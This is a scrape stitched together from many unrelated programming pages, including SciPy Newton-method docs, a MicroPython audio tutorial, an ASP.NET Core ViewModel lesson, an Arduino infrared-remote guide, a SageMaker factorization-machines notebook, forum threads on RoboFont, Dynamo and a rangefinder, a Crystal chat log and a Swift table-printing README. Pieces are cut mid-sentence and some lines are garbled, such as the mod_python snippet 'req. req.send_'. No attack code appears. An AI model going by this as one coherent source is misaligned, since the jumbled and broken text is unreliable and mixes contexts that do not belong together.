>>> root = optimize.newton(f, 1.5) >>> root 1.0000000000000016 >>> root = optimize.newton(f, 1.5, fprime2=lambda x: 6 * x) >>> root 1.0000000000000016
Only
fprimeis provided, use the Newton-Raphson method:
>>> root = optimize.newton(f, 1.5, fprime=lambda x: 3 * x**2) >>> root 1.0
Both
fprime2and
fprimeare provided, use Halley’s method:
>>> root = optimize.newton(f, 1.5, fprime=lambda x: 3 * x**2, ... fprime2=lambda x: 6 * x) >>> root 1.0
When we want to find zeros for a set of related starting values and/or function parameters, we can provide both of those as an array of inputs:
>>> f = lambda x, a: x**3 - a >>> fder = lambda x, a: 3 * x**2 >>> x = np.random.randn(100) >>> a = np.arange(-50, 50) >>> vec_res = optimize.newton(f, x, fprime=fder, args=(a, ))
The above is the equivalent of solving for each value in
(x, a)separately in a for-loop, just faster:
>>> loop_res = [optimize.newton(f, x0, fprime=fder, args=(a0,)) ... for x0, a0 in zip(x, a)] >>> np.allclose(vec_res, loop_res) True
Plot the results found for all values of
a:
>>> analytical_result = np.sign(a) * np.abs(a)**(1/3) >>> fig = plt.figure() >>> ax = fig.add_subplot(111) >>> ax.plot(a, analytical_result, 'o') >>> ax.plot(a, vec_res, '.') >>> ax.set_xlabel('$a$') >>> ax.set_ylabel('$x$ where $f(x, a)=0$') >>> plt.show() | https://docs.scipy.org/doc/scipy-1.2.0/reference/generated/scipy.optimize.newton.html | CC-MAIN-2022-21 | en | refinedweb |
Michel Thadeu <michel_ts at yahoo.com.br> wrote:
> def executar(req):
> req. req.send_
> req.write('<H1>Some test of executar!</H1>')
> return apache.OK
The publisher handler expects your handler to return the page body
rather than the status.
def executar(req):
return '<H1>Some test of executar!<H1>'
You can still use req.write() if you prefer; in that case, use
return ''
at the end. | https://modpython.org/pipermail/mod_python/2003-June/013857.html | CC-MAIN-2022-21 | en | refinedweb |
4. The AMP audio skin¶
Soldering and using the AMP audio skin.
The following video shows how to solder the headers, microphone and speaker onto the AMP skin.
For circuit schematics and datasheets for the components on the skin see The pyboard hardware.
4.1. Example code¶
The AMP skin has a speaker which is connected to
DAC(1) via a small
power amplifier. The volume of the amplifier is controlled by a digital
potentiometer, which is an I2C device with address 46 on the
IC2(1) bus.
To set the volume, define the following function:
import pyb def volume(val): pyb.I2C(1, pyb.I2C.CONTROLLER).mem_write(val, 46, 0)
Then you can do:
>>> volume(0) # minimum volume >>> volume(127) # maximum volume
To play a sound, use the
write_timed method of the
DAC object.
For example:)
You can also play WAV files using the Python
wave module. You can get
the wave module here and you will also need
the chunk module available here. Put these
on your pyboard (either on the flash or the SD card in the top-level directory). You will need an
8-bit WAV file to play, such as this one,
or to convert any file you have with the command:
avconv -i original.wav -ar 22050 -codec pcm_u8 test.wav
Then you can do:
>>> import wave >>> from pyb import DAC >>> dac = DAC(1) >>> f = wave.open('test.wav') >>> dac.write_timed(f.readframes(f.getnframes()), f.getframerate())
This should play the WAV file. Note that this will read the whole file into RAM so it has to be small enough to fit in it.
To play larger wave files you will have to use the micro-SD card to store it. Also the file must be read and sent to the DAC in small chunks that will fit the RAM limit of the microcontroller. Here is an example function that can play 8-bit wave files with up to 16kHz sampling:
import wave from pyb import DAC from pyb import delay dac = DAC(1) def play(filename): f = wave.open(filename, 'r') total_frames = f.getnframes() framerate = f.getframerate() for position in range(0, total_frames, framerate): f.setpos(position) dac.write_timed(f.readframes(framerate), framerate) delay(1000)
This function reads one second worth of data and sends it to DAC. It then waits one second and moves the file cursor to the new position to read the next second of data in the next iteration of the for-loop. It plays one second of audio at a time every one second. | http://docs.micropython.org/en/latest/pyboard/tutorial/amp_skin.html | CC-MAIN-2022-21 | en | refinedweb |
A newer version of this page is available. Switch to the current version.
ASPxCardViewCookiesSettings Class
Provides cookies and layout settings for ASPxCardView.
Namespace: DevExpress.Web
Assembly: DevExpress.Web.v20.2.dll
Declaration
public class ASPxCardViewCookiesSettings : ASPxGridCookiesSettings
Public Class ASPxCardViewCookiesSettings Inherits ASPxGridCookiesSettings
Related API Members
The following members accept/return ASPxCardViewCookiesSettings objects:
Remarks
The ASPxCardViewCookiesSettings class provides a set of properties that are applied to cookies and layout storing settings. An object of the ASPxCardViewCookiesSettings class can be ac | https://docs.devexpress.com/AspNet/DevExpress.Web.ASPxCardViewCookiesSettings?v=20.2 | CC-MAIN-2022-21 | en | refinedweb |
Back to: ASP.NET Core Tutorials For Beginners and Professionals
ViewModel in ASP.NET Core MVC Application
In this article, I am going to discuss ViewModel in ASP.NET Core MVC application with an example. Please read our previous article before proceeding to this article where we discussed Strongly Typed View in ASP.NET Core MVC application. As part of this article, we are going to discuss the following pointers.
- What is a View Model in ASP.NET Core?
- Why do we need the View Model?
- How to implement the View Model in ASP.NET Core Application?
What is a ViewModel in ASP.NET Core MVC?
In real-time applications, a single model object may not contain all the data required for a view. In such situations, we need to use ViewModel in the ASP.NET Core MVC application. So in simple words, we can say that a ViewModel in ASP.NET Core MVC is a model that contains more than one model data required for a particular view. Combining multiple model objects into a single view model object provides us better optimization.
Understanding the ViewModel in ASP.NET Core MVC:
The following diagram shows the visual representation of a view model in the ASP.NET Core MVC application.
Let say we want to display the student details in a view. We have two different models to represent the student data. The Student Model is used to represent the student basic details where the Address model is used to represent the address of the student. Along with the above two models, we also required some static information like page header and page title in the view. If this is our requirement then we need to create a view model let say StudentDetailsViewModel and that view model will contain both the models (Student and Address) as well as properties to store the page title and page header.
Creating the Required Models:
First, create a class file with the name Student.cs within the Models folder of your application. This is the model that is going to represent the basic information of a student such as a name, branch, section, etc.; } } }
Next, we need to create the Address model which is going to represent the Student Address such as City, State, Country, etc. So, create a class file with the name Address.cs within the Models folder and then copy and paste the following code in it.
namespace FirstCoreMVCApplication.Models { public class Address { public int StudentId { get; set; } public string City { get; set; } public string State { get; set; } public string Country { get; set; } public string Pin { get; set; } } }
Creating the View Model:
Now we need to create the View Model which will store the required data that is required for a particular view. In our case its student’s Details view. This View Model is going to represent the Student Model + Student Address Model + Some additional data like page title and page header.
You can create the View Models anywhere in your application, but it is recommended to create all the View Models within a folder called ViewModels to keep the things organized.
So first create a folder at the root directory of your application with the name ViewModels and then create a class file with the name StudentDetailsViewModel.cs within the ViewModels folder. Once you create the StudentDetailsViewModel.cs class file, then copy and paste the following code in it.
using FirstCoreMVCApplication.Models; namespace FirstCoreMVCApplication.ViewModels { public class StudentDetailsViewModel { public Student Student { get; set; } public Address Address { get; set; } public string Title { get; set; } public string Header { get; set; } } }
We named the ViewModel class as StudentDetailsViewModel. Here the word Student represents the Controller name, the word Details represent the action method name within the Student Controller. As it is a view model so we prefixed the word ViewModel. Although it is not mandatory to follow this naming convention, I personally prefer it to follow this naming convention to organize view models.
Creating Student Controller:
Right-click on the Controllers folder and then add a new class file with the name StudentController.cs and then copy and paste the following code in it.
using FirstCoreMVCApplication.Models; using FirstCoreMVCApplication.ViewModels; using Microsoft.AspNetCore.Mvc; namespace FirstCoreMVCApplication.Controllers { public class StudentController : Controller { public ViewResult Details() { //Student Basic Details Student student = new Student() { StudentId = 101, Name = "Dillip", Branch = "CSE", Section = "A", Gender = "Male" }; //Student Address Address address = new Address() { StudentId = 101, City = "Mumbai", State = "Maharashtra", Country = "India", Pin = "400097" }; //Creating the View model StudentDetailsViewModel studentDetailsViewModel = new StudentDetailsViewModel() { Student = student, Address = address, Title = "Student Details Page", Header = "Student Details", }; //Pass the studentDetailsViewModel to the view return View(studentDetailsViewModel); } } }
As you can see, now we are passing the view model as a parameter to the view. This is the view model that contains all the data required by the Details view. As you can notice, now we are not using any ViewData or ViewBag to pass the Page Title and Header to the view instead they are also part of the ViewModel which makes it a strongly typed view.
Creating the Details View:
First, add a folder with the name Student within the Views folder your project. Once you add the Student Folder, then you need to add a razor view file with the name Details.cshtml within the Student folder. Once you add the Details.cshtml view then copy and paste the following code in it.
@model FirstCoreMVCApplication.ViewModels.StudentDetailsViewModel <html xmlns=" <head> <title>@Model.Title</title> </head> <body> <h1>@Model.Header</h1> <div> StudentId : @Model.Student.StudentId </div> <div> Name : @Model.Student.Name </div> <div> Branch : @Model.Student.Branch </div> <div> Section : @Model.Student.Section </div> <div> Gender : @Model.Student.Gender </div> <h1>Student Address</h1> <div> City : @Model.Address.City </div> <div> State : @Model.Address.State </div> <div> Country : @Model.Address.Country </div> <div> Pin : @Model.Address.Pin </div> </body> </html>
Now, the Details view has access to the StudentDetailsViewModel object that we passed from the controller action method using the View() extension method. By using the @model directive, we set StudentDetailsViewModel as the Model for the Details view. Then we access Student, Address, Title, and Header using @Model property.
Now run the application, and navigate to the “/Student/Details” URL and you will see the output as expected on the webpage as shown in the below image.
In the next article, I am going to discuss the Routing in ASP.NET Core MVC application with an example. Here, in this article, I try to explain the ViewModel in ASP.NET Core MVC application with an example. I hope you understood the need and use of ViewModel in ASP.NET Core MVC Application.
3 thoughts on “ViewModel in ASP.NET Core MVC”
No need for these two lines in the StudentController code:
ViewBag.Title = “Student Details Page”;
ViewBag.Header = “Student Details”;
As Ahmed has already pointed above, setting the values for ViewBag.Title and ViewBag.Header is not required as we are using strongly typed model. They are not being used anyway.
Further, can you please write a guide on using a ViewModel for a form and submitting it back to the controller?
Thanks.
Yes. There is no need. Thanks for identifying the issue. We have corrected this. | https://dotnettutorials.net/lesson/view-model-asp-net-core-mvc/ | CC-MAIN-2022-21 | en | refinedweb |
.
This chapter describes modules (function and class libraries) which are built into MicroPython. There are a few categories of.
Note about the availability of modules and their contents: package path.
For example,
import json will first search for a file
json.py or
directory
json and load that package if it is found. If nothing is found,
it will fallback to loading the built-in
ujson module.
- Builtin Functions
array– arrays of numeric data
gc– control the garbage collector
math– mathematical functions
sys– system specific functions
ubinascii– binary/ASCII conversions
ucollections– collection and container types
uhashlib– hashing algorithms
uheapq– heap queue algorithm
uio– input/output streams
ujson– JSON encoding and decoding
uos– basic “operating system” services
ure– regular expressions
usocket– socket module
ussl– SSL/TLS module
ustruct– pack and unpack primitive data types
utime– time related functions
uzlib– zlib decompression
MicroPython-specific libraries¶
Functionality specific to the MicroPython implementation is available in the following libraries.
Libraries specific to the ESP8266¶
The following libraries are specific to the ESP8266. | http://docs.micropython.org/en/v1.9/esp8266/library/index.html | CC-MAIN-2022-21 | en | refinedweb |
Arduino: How to Process Infrared Signals from a Remote Control
—
—
Posted in Microcontrollers, Arduino, C++
Infrared remote controls are ubiquitous: TVs, IOT devices, toys. With an Arduino and an IR receiver, it is a matter of minutes to setup receiving IR commands and process them to control your Arduino application.
This blog posts show you the essential steps to process any IR commands from one of your remotes.
Setup
The Hardware requirements for this project are minimal:
- Arduino Uno or variant
- IR Remote Receiver Module
- Any remote
To connect the devices, follow these instructions. To identify the right pins, see also Arduino Pin Layout.
- Connect IR sensor Y Pin to any Arduino analog pin
- Connect IR sensor R Pin to Arduino 5V power out
- Connect IR sensor G Pin to any Arduino ground pin
Library Choice
Following my guideline, I checked the available libraries. For a basic ATmega328P Arduino Uno, the best library is Arduino-IRremote. It’s in active development, has good documentation, and you can find useful examples. I installed the library using the platform IO package manager.
Once installed, the first step is to identify the concrete protocol your remote uses.
Identify the Protocol
From the official example sketch, create the following program:
#include <Arduino.h> #include <IRremote.h> #define IR_PIN 3; void setup() { pinMode(LED_BUILTIN, OUTPUT); Serial.begin(9600); IrReceiver.begin(IR_PIN, ENABLE_LED_FEEDBACK); } void loop() { if (IrReceiver.decode()) { IrReceiver.printIRResultShort(&Serial); Serial.println(); IrReceiver.printIRResultAsCVariables(&Serial); } IrReceiver.resume(); }
Then, upload the program, connect to the serial monitor and press some keys on your remote. You should see output like this:
Protocol=NEC Address=0x4 Command=0x11 Raw-Data=0xEE11FB04 32 bits LSB first uint16_t address = 0x4; uint16_t command = 0x11; uint32_t data = 0xEE11FB04;
In rare cases, the signal might not get processed correctly. In this case, try another remote control.
Receive and Process IR Commands
When you know the protocol, it’s time to create the real program. Start your source code file with the following statements, and be sure to define the protocol before including the Header file.
#define DECODE_NEC 1 #include <IRremote.h> int IR_RECEIVE_PIN = 11;
In the
setup() part of your program, you initialize the
IrReceiver event.
IrReceiver.begin(IR_RECEIVE_PIN, ENABLE_LED_FEEDBACK, USE_DEFAULT_FEEDBACK_LED_PIN);
In the
loop part, you wait for the
IrReceiver.decode() interrupt to happen. Then, you can access the received data with type
IRData. Its definition is this:
struct IRData { decode_type_t protocol; ///< UNKNOWN, NEC, SONY, RC5, ... uint16_t address; ///< Decoded address uint16_t command; ///< Decoded command uint16_t extra; ///< Used by MagiQuest and for Kaseikyo unknown vendor ID uint8_t numberOfBits; ///< Number of bits received for data (address + command + parity) - to determine protocol length if different length are possible (currently only Sony). uint8_t flags; ///< See definitions above uint32_t decodedRawData; ///< up to 32 bit decoded raw data, formerly used for send functions. irparams_struct *rawDataPtr; /// pointer of the raw timing data to be decoded };
To print out the relevant data, use this:
void loop() { if (IrReceiver.decode()) { Serial.print("COMMAND is "); Serial.println(IrReceiver.decodedIRData.command); Serial.print("ADDRESS is "); Serial.println(IrReceiver.decodedIRData.address); Serial.print("RAW DATA is "); Serial.println(IrReceiver.decodedIRData.decodedRawData); IrReceiver.resume(); } }
You are almost done. Upload this program to your Arduino, then send commands from the remote. The output of the program will be similar to this:
COMMAND is 18 ADDRESS is 4 RAW DATA is 3977444100 COMMAND is 64 ADDRESS is 4 RAW DATA is 3208706820
Now, use this program to test each key of the remote, and make a note of their command ID. For example, in the above example, the
COMMAND 18 is recognized when I press the key
2, and the
COMMAND 64 is the arrow up button.
Defining Application Logic
The final part is easy. Inside the
loop() method, use
IrReceiver.decode() to check if new IR commands were received:
void loop() { if (IrReceiver.decode()) { // handle cases } }
Inside the method body, you define the custom logic that is triggered. I suggest to use a
switch statement that determines the currently pressed key, and then to handle each case with a dedicated
case statements. The basic structure is as follows. Important: At the end of the statement, be sure to call
IrReceiver.resume() in order to listen for new key events.
switch (IrReceiver.decodedIRData.command) { case (17): { // handle key 17 break; } case (18): { // handle key 18 break; } IrReceiver.resume(); }
In my case, I detect the various numbers of the remote control to print them on a screen. And I also process direction commands that are used to move a wheeled vehicle.
void processIR() { switch (IrReceiver.decodedIRData.command) { case (17): { printCharOnMatrix('1'); break; } case (18): { printCharOnMatrix('2'); break; } case (19): { printCharOnMatrix('3'); break; } // .... default : { printCharOnMatrix('@'); break; } } IrReceiver.resume(); }
Optimization
By default, all IR vendor protocol - see complete list of protocols - will be compiled into your program. If you know the exact protocol, just include this with a preprocessor directive like shown here:
#define DECODE_NEC 1 #include <Arduino.h> #include <IRemote.h>
And for fine tuning, there are many compile options activated by preprocessors definitions, see the official documentation.
Conclusion
Thanks to the excellent Arduino-IRremote library, parsing IR commands can be setup in minutes. This article showed you how to setup the library and start a program to sample the commands of your remote. We then saw how to implement custom control logic for each of the IR commands. Finally, I gave you some hints how to optimize the overall program by including only the required IR protocols. | https://admantium.com/blog/micro13_infra_red_commands/ | CC-MAIN-2022-21 | en | refinedweb |
Advanced URL mapping for REST
By now it's a commonplace how to implement a basic REST API in Caché and there is good documentation about it here: REST in Caché
A question that comes up from time to time is:
How can I make a parameter in my REST url optional?
Simply put, is it possible to create a URL map in Caché that maps a URL like this:
While this might look odd, this is actually a valid URL. You can read the details in RFC3986 section 3.3.
The framework provided by %CSP.Rest actually allows us to create maps that match the above URL. In the above referenced documenation this is only mentioned in a side note explaining that the URL map is being translated into a regular expression.
To leverage this power, we need to understand regular expressions. There is a nice document by Michael exploring the basics of regular expressions within the context of Caché here. If you're not familiar with regular expressions I highly recommend taking a moment to read through it.
In %CSP.Rest the UrlMap block actually compiles the maps into regular expressions. For example, an URL map like
Url="/class/:namespace/:classname" (taken from the Docserver example) is being compiled into:
/class/([^/]+)/([^/]+)
Recalling Michael's article you will see that this RegEx is matching a URL starting with
/class/ and then throwing the next two pieces of the URL separated by
GetClass method as parameters.
/into two matching groups. Those will later be passed into the
We can pass in regular expressions into the Url parameter of the UrlMap in our class directly. This way we circumvent the limitations of the simplification. And it allows us to create advanced URL maps:
XData UrlMap [ </Routes> }
In this case we just replaced the 1 or more modifier
+with 0 or more
*.
In combination with the regular expression intro you now have an idea of the power at your hands.
Please remember though:
with great power comes great responsibility ---(not Uncle Ben!)
Regular expressions are a very powerful tool, and as such regularly tempt people into implementing things that might really have been better off with other solutions.
Keep that in mind when creating your next regex masterpiece!
Happy coding! | https://community.intersystems.com/post/advanced-url-mapping-rest | CC-MAIN-2022-21 | en | refinedweb |
I would like to use Spell Check option which is available for Text Notes to apply on Multi-Category Tags as well. Is it possible using Dynamo?
Yes. There are a few posts on this already. Have a look around the forum, and check out the FuzzyDyno package.
Note that you need to spell check the parameter values not the tags themselves.
@JacobSmall I have tried searching with FuzzyDyno keyword. But I am unable to find any relevant topic.
If you could help point me towards the post or help paste the solution here.
This blog post should get you started: Fuzzy String Matching - Dynamo BIM
I have tried with this. Looks complicated. Is there any alternative method for Beginners?
Nope - winds up that performing a spell check is complicated work.
Hello,
here are 2 other solutions (IronPython or Archilab)
the IronPython solution code (using Interrop)
import sys import clr import System clr.AddReference("Microsoft.Office.Interop.Word") import Microsoft.Office.Interop.Word as Word clr.AddReference("office") from Microsoft.Office.Core import * clr.AddReference("System.Runtime.InteropServices") import System.Runtime.InteropServices lstWord = IN[0] out = [] app = Word.ApplicationClass() docWord = app.Documents.Add() # automatically detects the language you are using as you type languageAutoCheck = app.CheckLanguage # the language selected for the Microsoft Word user interface currentUILangInt = app.Language currentUILanguage = System.Enum.ToObject(MsoLanguageID, currentUILangInt) # check words for w in lstWord: spellingIsCorrect = app.CheckSpelling(w) if spellingIsCorrect: out.append(w) else: suggestions = [x.Name for x in app.GetSpellingSuggestions(w)] # get the first suggestion out.append(suggestions[0]) docWord.Close() app.Quit() app = None OUT = out
pyspellchecker CPython3 package can be also an alternative | https://forum.dynamobim.com/t/spell-check-and-correct-multi-category-tags-using-dynamo/74870 | CC-MAIN-2022-21 | en | refinedweb |
SOLVED a button inside subview
- jansindl3r last edited by
Hi, I have a general question. I don't understand, why the button's callback doesn't work. Can I have a working button inside subview, please? Thanks
from vanilla import * from mojo.events import addObserver, removeObserver from mojo.UI import CurrentGlyphWindow from mojo.events import addObserver, clearObservers class DrawObserverExample: def __init__(self): clearObservers() addObserver(self, "drawSub", "drawPreview") try: window = CurrentGlyphWindow() view = Group((0, 0, -0, 50)) view.button = Button((0, 0, 100, 10), 'hi', callback=self.changeTitle) view.text = EditText((0, 20, 100, 30)) view.button.setTitle('testje') window.addGlyphEditorSubview(view) except Exception as e: print(e) def changeTitle(self, event): print(event) def drawSub(self, notification): print(notification) DrawObserverExample()
hello @jansindl3r,
if you wish to add vanilla objects to the Glyph View, it’s easier to start from the Glyph Editor subview example. the buttons are added when the glyph window is opened by observing the
glyphWindowWillOpenevent; the drawing is handled separately by observing
drawevents.
ps. don’t use
clearObservers(), as it will invalidate all other observers (see the docs). use
removeObserverinstead.
- jansindl3r last edited by
Hi @gferreira, Thanks! I use clearObservers only when debugging, I am aware of that. It is handy for that, though sometimes buggy code is still listening to the actions and throwing errors so I need to restart robofont, is there a way how to do it without restarting the app? Has it happened to you as well?
I don't understand connection between the callback and the functions at all, sorry :( Is it described anywhere? I tried to search.
hi @jansindl3r,
is there a way how to do it without restarting the app?
yes: you can open/close a vanilla window to add/remove the observers.
here’s a simpler ‘button inside subview’ example, I hope this is clearer:
from random import random from vanilla import FloatingWindow, Button import mojo.drawingTools as ctx from mojo.events import addObserver, removeObserver from mojo.canvas import CanvasGroup from mojo.UI import CurrentGlyphWindow, UpdateCurrentGlyphView class OverlayViewExample(object): color = 1, 0, 0, 0.5"] self.view = CanvasGroup((0, -200, -0, -0), delegate=self) self.view.button = Button((-130, -50, 120, 22), "Hit Me", callback=self.buttonCallback) self.window.addGlyphEditorSubview(self.view) def observerDraw(self, notification): if self.view: self.view.show(True) def observerDrawPreview(self, notification): # hide the view in Preview mode if self.view: self.view.show(False) # button callback def buttonCallback(self, sender): print('button pressed') self.color = random(), random(), random(), 0.5 UpdateCurrentGlyphView() # canvas delegate callbacks def opaque(self): return True def acceptsFirstResponder(self): return False def acceptsMouseMoved(self): return True def becomeFirstResponder(self): return False def resignFirstResponder(self): return False def shouldDrawBackground(self): return False # draw callback def draw(self): g = self.window.getGlyph() if g is None: return x, y, w, h = self.window.getVisibleRect() ctx.fill(*self.color) ctx.rect(x + 10, y + 10, 100, 100) OverlayViewExample()
ps.
I don't understand connection between the callback and the functions at all, sorry :( Is it described anywhere? I tried to search.
not sure if this is what you mean, but the canvas delegate callbacks are inherited from the wrapped NSView object. see the introduction in Canvas and CanvasGroup | https://forum.robofont.com/topic/707/a-button-inside-subview | CC-MAIN-2022-21 | en | refinedweb |
An Introduction to Factorization Machines with MNIST
*Making a Binary Prediction of Whether a Handwritten Digit is a 0*
-
Prerequisites and Preprocessing
Permissions and environment variables
-
-
-
-
Set up hosting for the model
Import model into hosting
Create endpoint configuration
-
Validate the model for use
Introduction
Welcome to our example introducing Amazon SageMaker’s Factorization Machines factorization machine binary classifier. A factorization machine is a general-purpose supervised learning algorithm that you can use for both classification and regression tasks. It is an extension of a linear model that is designed to parsimoniously capture interactions between features in high dimensional sparse datasets..
Amazon SageMaker’s Factorization Machine algorithm provides a robust, highly scalable implementation of this algorithm, which has become extremely popular in ad click prediction and recommender systems. The main purpose of this notebook is to quickly show the basics of implementing Amazon SageMaker Factorization Machines, even if the use case of predicting a digit from an image is not where factorization machines shine.
To get started, we need to set up the environment with a few prerequisite steps, for permissions, configurations, and so on.
Prequisites and Preprocessing
Permissions and environment variables
This notebook was tested in Amazon SageMaker Studio on a ml.t3.medium instance with Python 3 (Data Science) kernel.
Let’s start by specifying:
The S3 buckets and prefixes that you want to use for training and model data and where the original mnist data is located. import json role = get_execution_role() region = boto3.Session().region_name # S3 bucket where the original mnist data is downloaded and stored. downloaded_data_bucket = f"sagemaker-sample-files" downloaded_data_prefix = "datasets/image/MNIST" print(role) sess = sagemaker.Session() # bucket used for storing processed data and model. bucket = sess.default_bucket() prefix = "sagemaker/DEMO-fm-mnist" print(bucket)
Data ingestion
Next, we read the MNIST dataset [1] from an existing repository for preprocessing prior to training. It was downloaded from here. The import boto3 # Factorization Machines takes recordIO-wrapped protobuf, where the data we have today is a pickle-ized numpy array on disk.
Most of the conversion effort is handled by the Amazon SageMaker Python SDK, imported as
sagemaker below.
Notice, despite the fact that most use cases for factorization machines will utilize spare input, we are writing our data out as dense tensors. This will be fine since the MNIST dataset is not particularly large or high dimensional.
[ ]:
import io import numpy as np import sagemaker.amazon.common as smac vectors = np.array([t.tolist() for t in train_set[0]]).astype("float32") labels = np.where(np.array([t.tolist() for t in train_set[1]]) == 0, 1.0, 0 factorization machine model
Once we have the data preprocessed and available in the correct format for training, the next step is to actually train the model using the data. Since this data is relatively small, it isn’t meant to show off the performance of the Amazon SageMaker’s Factorization Machines in training,.amazon.amazon_estimator import get_image_uri container = get_image_uri(boto3.Session().region_name, "factorization-machines"). -
num_factors is set to 10. As mentioned initially, factorization machines find a lower dimensional representation of the interactions for all features. Making this value smaller provides a more parsimonious model, closer to a linear model, but may sacrifice information about interactions. Making it larger provides a higher-dimensional representation of feature interactions, but adds computational complexity and can lead to overfitting. In a practical application, time should be
invested to tune this parameter to the appropriate value.
[ ]:
import boto3 import sagemaker sess = sagemaker.Session() fm = sagemaker.estimator.Estimator( container, role, instance_count=1, instance_type="ml.c4.xlarge", output_path=output_location, sagemaker_session=sess, ) fm.set_hyperparameters( feature_dim=784, predictor_type="binary_classifier", mini_batch_size=200, num_factors=10 ) fm.
[ ]:
fm_predictor = fm.
Since factorization machines are so frequently used with sparse data, making inference requests with a CSV format (as is done in other algorithm examples) can be massively inefficient. Rather than waste space and time generating all of those zeros, to pad the row to the correct dimensionality, JSON can be used more efficiently. Since we trained the model using dense data, this is a bit of a moot point, as we’ll have to pass all the 0s in anyway.
Nevertheless, we’ll write our own small function to serialize our inference request in the JSON format that Amazon SageMaker Factorization Machines expects.
[ ]:
import json from sagemaker.predictor import json_deserializer def fm_serializer(data): js = {"instances": []} for row in data: js["instances"].append({"features": row.tolist()}) return json.dumps(js) fm_predictor.serializer.serialize = fm_serializer fm_predictor.deserializer = json_deserializer
Now let’s try getting a prediction for a single record.
[ ]:
result = fm_predictor.predict(train_set[0][30:31], initial_args={"ContentType": "application/json"}) = fm_predictor.predict(array, initial_args={"ContentType": "application/json"})51 images of the digit 0 correctly (confusingly this is class 1). Meanwhile we predict 165 images as the digit 0 when in actuality they aren’t, and we miss predicting 29 images of the digit 0 that we should have.
Note: Due to some differences in parameter initialization, your results may differ from those listed above, but should remain reasonably consistent.
(fm_predictor.endpoint) | https://sagemaker-examples.readthedocs.io/en/latest/introduction_to_amazon_algorithms/factorization_machines_mnist/factorization_machines_mnist.html | CC-MAIN-2022-21 | en | refinedweb |
Having a bit of a problem two days now. I cannot get my Daventech ranger finder to work. I think its working but my lcd string doesn’t seem it wants to update.
logic for range finder:
1st - send a signal out for a minimum of 10us thorugh pd1.
2nd - When this happens if there is an object infront it will send the signal back to pd0.
**But all i see is “loop again on my lcd” see code. I took that line out and it said “Signal happened” which (indicates that a signal came back) over and over. Just to see if it works withou worring out distance calculator. Was just wondering if i am overlooking something.
#include <avr/io.h> #include "LCD.h" #include "SPI.h" #include <util/delay.h> #define F_CPU 1000000UL // Orangutan frequency (2MHz)!!! int main(void) { SPIInit(); // allows the mega644 to send commands to the mega168 LCDInit(); DDRD &= ~(1 << PD0); //make PD0 an input to receive echo DDRD |= 1 << PD1; // PD1 an output to send signal while (1) { PORTD |= 1 << PD1; //turn on to produce pulse delay_us(15); //make 15 us elapse PORTD &= ~(1 << PD1); // clear while (!(PIND&(1<<PC0))) { LCDString("No signal has returned as yet"); } LCDString("Signal happened"); delay_ms(15); LCDClear(); if (!(PIND&(1<<PC0))) { LCDString("Signal yes it wasnt n e hoax!"); delay_ms(1000); } LCDString("Loop again"); delay_ms(1000); } }
I also attached a picture to show how the signals work graphically | https://forum.pololu.com/t/sensor/960 | CC-MAIN-2022-21 | en | refinedweb |
The Crystal programming language | | Fund Crystal's development: | Docs: | API:
require "socket" def process(client) client.tcp_nodelay = true while msg = client.gets client.puts(msg) end end server = TCPServer.new "localhost", 1234 loop { spawn process(server.accept) }
tcp_nodelay = truedropped the latency from 88ms to 44ms for me.
@slava-dzyba how do you test the speed? I get something more like 30-40 nanoseconds for this echo server code. my little tester:
require "socket" require "benchmark" client = TCPSocket.new "localhost", 1234 payload = "Hello world" * 1_000 time = Benchmark.measure do client.puts payload client.gets end puts time
Sample output:
0.000000 0.000000 0.000000 ( 0.000048)
Does anyone have experience working with the parser? There aren't any comments or guides and I would like to make an addition.
Basically, I was thinking it would be cool to be able to splat a tuple just like you can in a method definition, but during multiple assignment. Like this:
head, *tail = {"Seattle", "Hong Kong", "London"} head # => "Seattle" tail # => {"Hong Kong", "London"}
def splat(head, *tail) {head, tail} end head, tail = splat(*{"Seattle", "Hong Kong", "London"}) pp head pp tail
Does anyone have experience working with the parser?
by @MakeNowJust but in Japanesse :sweat_smile:
I'm learning about Crystal compiler itself, I just started with the lexer :sweat_smile:I'm learning about Crystal compiler itself, I just started with the lexer :sweat_smile:
require "compiler/crystal/syntax" parser = Crystal::Lexer.new("def f!=") puts parser.next_token puts parser.next_token puts parser.next_token puts parser.next_token | https://gitter.im/crystal-lang/crystal?at=59b9d56ac101bc4e3ac415ed | CC-MAIN-2022-21 | en | refinedweb |
The table is a helper function to print the table.
You can print the table bypassing the Any data!
[e.g.,
1d array,
2d array, and
dictionary]
It inspired by
javascript
console.table.
I'm sure if you practice coding interviews, it helps you a lot. You don't need to struggle for checking results using a build-in print function!
import Table //1D Array of String with Header print(table: ["Good", "Very Good", "Happy", "Cool!"], header: ["Wed", "Thu", "Fri", "Sat"]) //1D Array of Int print(table: [2, 94231, 241245125125]) //1D Array of Double print(table: [2.0, 931, 214.24124]) //2D Array of String print(table: [["1", "HELLOW"], ["2", "WOLLEH"]], header: ["Index", "Words"]) //2D Array of String, but Length is not equal! print(table: [["1", "b2"], ["Hellow", "Great!"], ["sdjfklsjdfklsadf", "dsf", "1"]]) //2D Array of Int, but Length is not equal! print(table: [[1, 2, 3], [4, 5, 6], [7, 8, 9, 10]]) //D.I.C.T.I.O.N.A.R.Y!! print(table: ["1": 1, 2: "Hellow?", 1.2: 0, "I'm Table": [1, 2, 3, 2, 1]], header: ["key", "value"])
+----+---------+-----+-----+ |Wed |Thu |Fri |Sat | +----+---------+-----+-----+ |Good|Very Good|Happy|Cool!| +----+---------+-----+-----+ +-+-----+------------+ |2|94231|241245125125| +-+-----+------------+ +---+-----+---------+ |2.0|931.0|214.24124| +---+-----+---------+ +-----+------+ |Index|Words | +-----+------+ |1 |HELLOW| +-----+------+ |2 |WOLLEH| +-----+------+ +----------------+------+-+ |1 |b2 | | +----------------+------+-+ |Hellow |Great!| | +----------------+------+-+ |sdjfklsjdfklsadf|dsf |1| +----------------+------+-+ +-+-+-+--+ |1|2|3| | +-+-+-+--+ |4|5|6| | +-+-+-+--+ |7|8|9|10| +-+-+-+--+ +---------+---------------+ |key |value | +---------+---------------+ |2 |Hellow? | +---------+---------------+ |I'm Table|[1, 2, 3, 2, 1]| +---------+---------------+ |1.2 |0 | +---------+---------------+ |1 |1 | +---------+---------------+
The default distribution is
fillProportionally.
print(table: ["Good", "Very Good", "Happy", "Cool!"], header: ["Wed", "Thu", "Fri", "Sat"])
+----+---------+-----+-----+ |Wed |Thu |Fri |Sat | +----+---------+-----+-----+ |Good|Very Good|Happy|Cool!| +----+---------+-----+-----+
But It can be set by
fillEqually like below
print( table: ["Good", "Very Good", "Happy", "Cool!"], header: ["Wed", "Thu", "Fri", "Sat"], distribution: .fillEqually )
